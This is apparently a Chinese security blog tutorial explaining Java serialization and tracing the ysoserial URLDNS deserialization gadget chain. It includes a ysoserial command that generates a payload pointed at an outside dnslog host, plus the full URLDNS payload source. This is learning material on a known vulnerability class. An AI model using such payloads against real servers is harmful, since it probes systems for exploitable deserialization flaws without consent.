Java序列化与反序列化

2021-06-01

JAVA序列化与反序列化

为什么需要序列化

java的序列化机制就是为了持久化存储某个对象或者在网络上传输某个对象，一旦jvm关闭，那么java中的类，对象也就销毁了，所以要想保存它，就需要把他转换为字节序列写到某个文件或是其它哪里。

序列化与反序列化

Java 序列化是指把 Java 对象转换为字节序列的过程
ObjectOutputStream类的 writeObject() 方法可以实现序列化

Java 反序列化是指把字节序列恢复为 Java 对象的过程
ObjectInputStream 类的 readObject() 方法用于反序列化。

要实现序列化，类必须实现java.io.Serializable接口，并且所有的属性都必须是可序列化的。

实例

//Name.java
package serialize;

import java.io.Serializable;

public class Name implements Serializable {
    public String name = "tunan";
    public int test =12;
    public int age =25;

    public void seeHello() {
        System.out.println("hello tunan");
        System.out.println(age);
    }

}

//Main.java
package serialize;

import java.io.*;

public class Main {
    public static void main(String[] args) {
        Name username = new Name();

        try {
            FileOutputStream fos = new FileOutputStream("./username.txt");
            ObjectOutputStream os = new ObjectOutputStream(fos);
            os.writeObject(username);

            //  创建一个FIleInputStream
            FileInputStream fis = new FileInputStream("./username.txt");
            // 将FileInputStream封装到ObjectInputStream中
            ObjectInputStream oi = new ObjectInputStream(fis);
            // 调用readObject从username.txt中反序列化出对象，还需要进行一下类型转换，默认是Object类型
            Name name1 = (Name)oi.readObject();

            username.seeHello();

        } catch (Exception e) {
            e.printStackTrace();
        }


    }
}

可以通过xxd命令看一下我们序列化的数据

中间哪一行是16进制内容，最右侧是字符显示，注意看前面那个aced 0005

前面的aced：STREAM_MAGIC，声明使用了序列化协议，可以通过这个知道是不是序列化内容。
后面的0005：STREAM_VERSION，序列化协议版本。

(RWV0)9MXHVLBDVTW6L6E)Y

然后通过修改age的修饰符，在运行一遍。

1	public static int age =25

可以看到age没有被序列化，所以不止是transient关键字修饰的属性，static关键字修饰的属性也不会被序列化。

对比php反序列化

php反序列化一个对象时会自动触发__weakup、__destruct这些函数，如果这两个函数中有敏感操作，那么就可能出现漏洞。那么在java中是不是也有自动触发的函数呢，其实就是readobject()函数。如果我们改写readobject()函数，并且readobject()有危险操作就会导致反序列化漏洞。

修改Name.java，然后再次运行，可以看到readObject函数运行，并弹出计算器。

调试

将下载来的文件打包好，生成.jar文件，然后执行命令，比如这里我想调试URLDNS，可以用网上的dnslog平台

1	java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://foh1xpxj.ns.dns3.cf >url.bin

然后测试一下

package Test;

import java.io.ObjectInputStream;
import java.io.FileInputStream;

public class URLDNS {
    public static void main(String[] args) throws Exception {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("路径"));
        ois.readObject();
    }
}

URLDNS分析

可以在这里下载源码ysoserial/URLDNS.java at master · frohoff/ysoserial · GitHub

package ysoserial.payloads;

import java.io.IOException;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 * A blog post with more details about this gadget chain is at the url below:
 *   https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
 *
 *   This was inspired by  Philippe Arteau @h3xstream, who wrote a blog
 *   posting describing how he modified the Java Commons Collections gadget
 *   in ysoserial to open a URL. This takes the same idea, but eliminates
 *   the dependency on Commons Collections and does a DNS lookup with just
 *   standard JDK classes.
 *
 *   The Java URL class has an interesting property on its equals and
 *   hashCode methods. The URL class will, as a side effect, do a DNS lookup
 *   during a comparison (either equals or hashCode).
 *
 *   As part of deserialization, HashMap calls hashCode on each key that it
 *   deserializes, so using a Java URL object as a serialized key allows
 *   it to trigger a DNS lookup.
 *
 *   Gadget Chain:
 *     HashMap.readObject()
 *       HashMap.putVal()
 *         HashMap.hash()
 *           URL.hashCode()
 *
 *
 */
@SuppressWarnings({ "rawtypes", "unchecked" })
@PayloadTest(skip = "true")
@Dependencies()
@Authors({ Authors.GEBL })
public class URLDNS implements ObjectPayload<Object> {

        public Object getObject(final String url) throws Exception {

                //Avoid DNS resolution during payload creation
                //Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
                URLStreamHandler handler = new SilentURLStreamHandler();

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

                Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.

                return ht;
        }

        public static void main(final String[] args) throws Exception {
                PayloadRunner.run(URLDNS.class, args);
        }

        /**
         * <p>This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
         * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
         * using the serialized object.</p>
         *
         * <b>Potential false negative:</b>
         * <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
         * second resolution.</p>
         */
        static class SilentURLStreamHandler extends URLStreamHandler {

                protected URLConnection openConnection(URL u) throws IOException {
                        return null;
                }

                protected synchronized InetAddress getHostAddress(URL u) {
                        return null;
                }
        }
}

URLDNS的getobject方法是最后生成payload的方法，然后我们可以看到这个方法返回了一个类，而这个类就是最后被序列化的对象，而这个类，我们往前看，可以发现他在这个方法中是HashMap。但是我们知道java的反序列化都是readobject()方法开始的。所以我们回溯一下这个HashMap类的readobject方法。.

private void readObject(java.io.ObjectInputStream s)
        throws IOException, ClassNotFoundException {
        // Read in the threshold (ignored), loadfactor, and any hidden stuff
        s.defaultReadObject();
        reinitialize();
        if (loadFactor <= 0 || Float.isNaN(loadFactor))
            throw new InvalidObjectException("Illegal load factor: " +
                                             loadFactor);
        s.readInt();                // Read and ignore number of buckets
        int mappings = s.readInt(); // Read number of mappings (size)
        if (mappings < 0)
            throw new InvalidObjectException("Illegal mappings count: " +
                                             mappings);
        else if (mappings > 0) { // (if zero, use defaults)
            // Size the table using given load factor only if within
            // range of 0.25...4.0
            float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
            float fc = (float)mappings / lf + 1.0f;
            int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
                       DEFAULT_INITIAL_CAPACITY :
                       (fc >= MAXIMUM_CAPACITY) ?
                       MAXIMUM_CAPACITY :
                       tableSizeFor((int)fc));
            float ft = (float)cap * lf;
            threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
                         (int)ft : Integer.MAX_VALUE);

            // Check Map.Entry[].class since it's the nearest public type to
            // what we're actually creating.
            SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
            @SuppressWarnings({"rawtypes","unchecked"})
            Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
            table = tab;

            // Read the keys and values, and put the mappings in the HashMap
            for (int i = 0; i < mappings; i++) {
                @SuppressWarnings("unchecked")
                    K key = (K) s.readObject();
                @SuppressWarnings("unchecked")
                    V value = (V) s.readObject();
                putVal(hash(key), key, value, false, false);
            }
        }
    }

从上面的注释中一句话

“During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered. 在上述放置期间，将计算并缓存URL的hashCode。如此重置下次调用hashCode时将触发DNS查找。所以应该是hashcode的操作导致了一系列问题。

这里的最后一行，计算了hashmap的键的hash值

1	putVal(hash(key), key, value, false, false);

所以我们可以在这里打断点调试一下。

看到上面的putval()函数中使用了hash()方法，我们回溯一下这个函数

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

它调用了一次hashcode()方法，在回溯一下

public synchronized int hashCode() {
    if (hashCode != -1)
        return hashCode;

    hashCode = handler.hashCode(this);
    return hashCode;
}

在这中间，hashCode=handler.hashcode(this)，在往前看，回溯这个handler的hashcode函数

protected int hashCode(URL u) {
       int h = 0;

       // Generate the protocol part.
       String protocol = u.getProtocol();
       if (protocol != null)
           h += protocol.hashCode();

       // Generate the host part.
       InetAddress addr = getHostAddress(u);
       if (addr != null) {
           h += addr.hashCode();
       } else {
           String host = u.getHost();
           if (host != null)
               h += host.toLowerCase().hashCode();
       }

       // Generate the file part.
       String file = u.getFile();
       if (file != null)
           h += file.hashCode();

       // Generate the port part.
       if (u.getPort() == -1)
           h += getDefaultPort();
       else
           h += u.getPort();

       // Generate the ref part.
       String ref = u.getRef();
       if (ref != null)
           h += ref.hashCode();

       return h;
   }

在往下回溯这个getHostAddress

protected synchronized InetAddress getHostAddress(URL u) {
    if (u.hostAddress != null)
        return u.hostAddress;

    String host = u.getHost();
    if (host == null || host.equals("")) {
        return null;
    } else {
        try {
            u.hostAddress = InetAddress.getByName(host);
        } catch (UnknownHostException ex) {
            return null;
        } catch (SecurityException se) {
            return null;
        }
    }
    return u.hostAddress;
}

在这里u.hostAddress = InetAddress.getByName(host);是根据主机名获取ip地址的。

所以我们可以得出这个漏洞的调用链

hashmap->readobject()
hashmap->hash()
url->hashcode()
URLStreamHandler->hashCode()
URLStreamHandler->getHostAddress()
InetAddress->getByName()